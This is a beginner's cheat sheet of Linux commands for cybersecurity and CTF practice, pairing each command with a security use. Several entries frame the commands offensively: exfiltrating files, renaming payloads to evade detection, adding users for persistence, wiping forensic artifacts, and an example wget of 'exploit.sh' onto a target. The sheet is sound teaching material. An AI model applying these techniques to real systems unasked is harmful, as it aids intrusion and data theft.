Mastering Linux for Cybersecurity

Print Working Directory. Shows your current location in the filesystem.

Essential for orientation after gaining access to a new shell or directory.

List directory contents. Use ls -la to see all files (including hidden) and permissions. -R recursively lists contents.

Used to discover hidden files (.bash_history, .ssh), configurations, scripts, and potential flags.

Change Directory. Used to navigate through the filesystem. Shortcuts: cd ~ (home), cd .. (up one level), cd - (previous directory).

The primary way to move around a compromised system to explore different directories like logs or web roots.

Concatenate and print files. Displays the content of a file. Can also create new files or combine multiple files.

Quickly read content of flags, configuration files (/etc/passwd), or source code. For larger files, use less or more.

View file content page by page. Allows scrolling and searching within large files. Press q to quit.

Efficiently review large log files (/var/log/auth.log) or extensive codebases without overwhelming the terminal.

Similar to less, but with more basic navigation. Displays file content one screen at a time. Press q to quit.

A simpler alternative to less for paginating through text files.

Output the first part of files (default: first 10 lines). Use -n to specify number of lines.

Quickly preview the beginning of log files or configuration files to get an overview.

Output the last part of files (default: last 10 lines). Use -f to follow file changes (useful for live logs).

Monitor real-time log updates (tail -f /var/log/apache2/access.log) during web exploitation or system monitoring.

Create a new, empty file in a specified directory. If the file exists, it updates its timestamp.

Creating placeholder files, or files for redirection in exploits or temporary data storage.

Copy files and directories. Use cp -R for directories.

Copying tools to a target, duplicating sensitive files for exfiltration, or making backups before modification.

Move or rename files and directories.

Relocating sensitive files, renaming malicious payloads to evade detection, or organizing forensic artifacts.

Make directory. Creates one or multiple directories. Use -p to create nested directory structures.

Organizing your CTF notes, creating temporary directories for exploits, or structuring your penetration testing workspace.

Remove files or directories. **WARNING:** rm -rf (recursive force) deletes directories and their contents without confirmation and is very dangerous.

Cleaning up temporary files, removing forensic artifacts, or deleting malicious files after analysis. Use with extreme caution.

Remove empty directory. Only works if the directory contains no files or subdirectories.

Cleaning up empty directories after file operations or system cleanup tasks.

Determine file type. Identifies the nature of a file (e.g., text, binary, script, image).

Crucial for identifying unknown files encountered in CTFs to know how to proceed with analysis (e.g., file exploit.bin to confirm it's an executable).

Display previously executed commands.

Reviewing your own actions during a CTF, or examining a compromised system's history for clues about previous activity or commands executed by other users.

Locating sensitive files, specific binaries (e.g., SUID binaries), or files with certain permissions across the entire system.

Faster file search that relies on a pre-built database. Requires sudo updatedb to refresh the database.

Quickly finding known files across the system, especially useful when the database is up-to-date.

Outputs the full path of a binary or executable, showing where a command is located on the system.

Verifying the path of an executable, especially in PATH manipulation attacks or when confirming tool availability.

Archiving utility used to bundle multiple files or directories into a single archive (often .tar or .tar.gz with compression).

Bundling files for exfiltration, extracting archived data from a target system, or packaging tools for transfer.

Compress and package files into a .zip archive.

Reducing file sizes for exfiltration or creating compressed archives of sensitive data.

Extract files from a .zip archive.

Decompressing downloaded tools, exploits, or data archives on a target system.

Change file mode bits (permissions). Can use symbolic mode (e.g., u+x) or octal mode (e.g., 755).

Used to make scripts executable, set proper permissions on sensitive files, or exploit misconfigured permissions for privilege escalation.

Change file owner and group. Syntax: chown user:group filename.

Managing access control by assigning specific users or groups ownership of files. Useful in post-exploitation to change file ownership.

Report a snapshot of the current processes. ps aux shows all processes (user, CPU, memory, command).

Used to identify running services, daemons, or suspicious processes that might be part of the challenge or malware activity.

Display Linux processes dynamically, showing real-time system resource usage (CPU, memory) and active processes. Press q to quit.

Quickly identify resource-intensive processes, potential malware, or unexpected activity on a system.

An interactive process viewer, similar to top but with a more user-friendly interface and additional features like vertical and horizontal scrolling.

Enhanced real-time monitoring of processes, allowing for easier identification and management of suspicious or resource-hogging applications.

Terminating unresponsive or malicious processes identified during system analysis or post-exploitation.

Terminate all instances of a specific program, useful for quickly shutting down multiple malicious processes.

List open files. Shows processes that have specific files or network connections open.

Identify which processes are interacting with sensitive files, network ports, or devices, crucial for forensic analysis and understanding system activity.

Display running processes in a tree-like format, showing parent-child relationships.

Visualize process hierarchies to understand how processes were spawned, which can help in identifying rootkits or complex malware chains.

Install new packages. Example: sudo pacman -S nmap.

Installing necessary tools and utilities on Arch/Garuda Linux systems, including penetration testing tools.

Remove packages. Example: sudo pacman -R nmap.

Removing unwanted or malicious software from a system.

Synchronize and update all packages on the system. This is a crucial command for system maintenance.

Keeping your system and tools up-to-date with the latest security patches and features, reducing vulnerabilities.

Search for packages in the repositories. Example: pacman -Ss wireshark.

Discovering available tools and software that might be useful for a CTF or penetration test.

Globally search for a regular expression and print matching lines. Powerful options include -r (recursive) and -i (ignore case).

A powerful text processing tool used for pattern scanning and processing language. Excellent for extracting and manipulating data from structured text files.

Parsing log files, extracting specific fields from command output, or transforming data for analysis during forensics or data exfiltration.

Stream editor for filtering and transforming text. Used for finding and replacing text in files or streams.

Modifying configuration files, sanitizing data, or injecting malicious commands into scripts during post-exploitation.

Remove sections from each line of files. Useful for extracting specific columns from delimited data.

Extracting usernames from /etc/passwd or specific fields from log entries for further analysis.

Sort lines of text files. Can sort alphabetically, numerically, or by specific fields.

Organizing large lists of data (e.g., wordlists, IP addresses) for easier analysis or processing.

Report or omit repeated lines. Often used with sort to get unique entries from a list.

Filtering duplicate entries from wordlists or lists of discovered files/IPs to reduce noise during enumeration.

Print newline, word, and byte counts for files. Useful for quickly assessing file size or content volume.

Quickly check the number of lines in a log file or a wordlist, or count specific occurrences with grep | wc -l.

Compare files line by line. Shows the differences between two files.

Identifying changes made to system configuration files by an attacker, or comparing exploit code versions.

Report file system disk space usage. Shows total, used, and available space on mounted filesystems.

Check disk space on a target system to see if large files (e.g., logs, exfiltrated data) are present or if the disk is full.

Estimate file space usage. Shows disk usage of files and directories.

Identify large directories or files that might contain sensitive data or be indicative of malicious activity.

Attach a filesystem to a specific mount point in the file system tree.

Understanding how external devices or network shares are mounted, which can reveal additional attack surfaces or data sources.

Detach mounted filesystems.

Unmounting compromised or irrelevant filesystems during forensic cleanup or system hardening.

Print system information. Use -a for all information (kernel name, hostname, kernel version, architecture).

Gathering basic system information (OS, kernel version) for vulnerability research and exploit development.

Show or set the system's hostname.

Identify the target machine by its network name during reconnaissance.

Print or control the kernel ring buffer. Displays messages from the kernel.

Reviewing kernel messages for hardware errors, security events, or signs of rootkit activity.

Manipulate disk partition tables. Requires root privileges.

Understanding disk layout on a compromised system or preparing disks for forensic imaging.

Build a Linux filesystem. Used to format partitions.

Creating new filesystems on disks or partitions, relevant in forensic scenarios or setting up new storage.

Manage user-specific cron tables for scheduling tasks.

Identifying scheduled tasks that might be malicious, persistent backdoors, or legitimate tasks that can be abused.

Create a new user account.

Creating new user accounts for persistence or to facilitate access on a compromised system.

Delete a user account and optionally their home directory.

Removing unauthorized user accounts or cleaning up after an and attack.

Create a new group.

Creating new groups for privilege management or to organize users on a system.

Delete a group.

Removing unnecessary or malicious groups from a system.

Print real and effective user and group IDs. Shows current user's identity and group memberships.

Quickly check current user privileges and group memberships, which is vital for privilege escalation paths.

Control the systemd system and service manager. Used to start, stop, enable, disable, and check the status of services.

Managing critical services like web servers, SSH, or databases. Attackers might disable security services or enable malicious ones. Defenders use it to secure services.

Print all or part of the environment. Shows environment variables and their values.

Discovering sensitive information stored in environment variables (e.g., API keys, passwords) or understanding how programs are configured.

Set an environment variable for child processes.

Setting up custom PATH variables for privilege escalation, or defining variables for scripts and exploits.

A simple, user-friendly text editor for the command line.

Quickly editing configuration files, scripts, or notes on a remote system when vim is too complex or unavailable.

A highly configurable and powerful text editor. Has a steep learning curve but is extremely efficient once mastered.

Extensive editing of code, configuration files, or large text documents. Often available on compromised systems.

Generate, manage, and convert authentication keys for SSH. Used to create public/private key pairs.

Generating SSH keys for secure remote access, or analyzing existing keys on a compromised system for unauthorized access.

Secure Copy Protocol. Used to securely copy files between hosts on a network.

Securely transferring tools, exploits, or exfiltrated data to/from a remote server.

Secure File Transfer Protocol. An interactive file transfer program, similar to FTP but over SSH.

Interactively browsing and transferring files to/from a remote server over a secure channel.

A fast, versatile, remote (and local) file-copying tool. Efficiently synchronizes files and directories.

Mirroring directories for data exfiltration, or maintaining backups of sensitive data.

Uncomplicated Firewall. A user-friendly front-end for iptables to manage firewall rules.

Quickly configuring firewall rules on systems that use ufw to block or allow network traffic, essential for defense or establishing covert channels.

Query the systemd journal. Used to view and filter system logs.

Analyzing system logs for security events, failed login attempts, or signs of compromise, offering a more modern way to view logs than traditional /var/log files.

Modern utility to manage network interfaces, IP addresses, and routing tables. Replaces ifconfig. Example: ip addr show.

Finding your own IP address, identifying network interfaces, and understanding network configurations on a target or your own machine.

Test network connectivity to a host by sending ICMP Echo Request packets.

Basic host discovery, checking if a target machine is reachable, or verifying network connectivity to a C2 server.

Display network connections, routing tables, and interface statistics. ss is the faster, more informative modern replacement. Example: ss -tulnp (TCP, UDP, listening, numeric, process info).

Identifies open ports, active connections, and listening services on a target or your own machine, revealing potential attack vectors or malware activity.

Maps the path that packets take to reach a destination, showing hops and response times.

Mapping network paths, identifying network segmentation, firewalls, or intermediate devices between you and a target.

Query Domain Name System (DNS) records. dig is generally preferred for more detailed DNS information. Example: dig example.com.

DNS enumeration for subdomains, mail servers, or other related infrastructure during reconnaissance.

Lookup public domain registration information, including owner details, registration dates, and contact info.

Gathering intelligence on domain owners, their contact information, and domain registration history during OSINT (Open Source Intelligence).

Transfer data from or to a server. curl is versatile for interacting with web servers (e.g., curl -I https://example.com for HTTP headers), while wget is primarily for downloading files (e.g., wget https://example.com/exploit.sh).

Essential for testing web vulnerabilities (like LFI/RCE), downloading tools/exploit to a target, or exfiltrating data from web servers.

Packet analyzer that captures network traffic from specified interfaces (e.g., sudo tcpdump -i eth0).

Analyzing network traffic for sensitive data, credentials, hidden communications, or identifying malicious network patterns during forensics or active attacks.

Network Mapper. The industry-standard tool for network discovery and security auditing. Example: nmap -sV example.com (service version detection).

The go-to tool for discovering live hosts, open ports, and services on a network. Fundamental for initial reconnaissance and vulnerability assessment.

Execute a command as another user (typically the superuser). sudo -l lists allowed commands for the current user.

A primary vector for privilege escalation. Misconfigurations allowing unprivileged users to run powerful commands as root are common in CTFs and real-world scenarios.

Linux firewall utility used to manage network traffic rules (allow/block based on IP, port, protocol).

Understanding firewall rules on a target system, or configuring your own firewall for defense and network segmentation.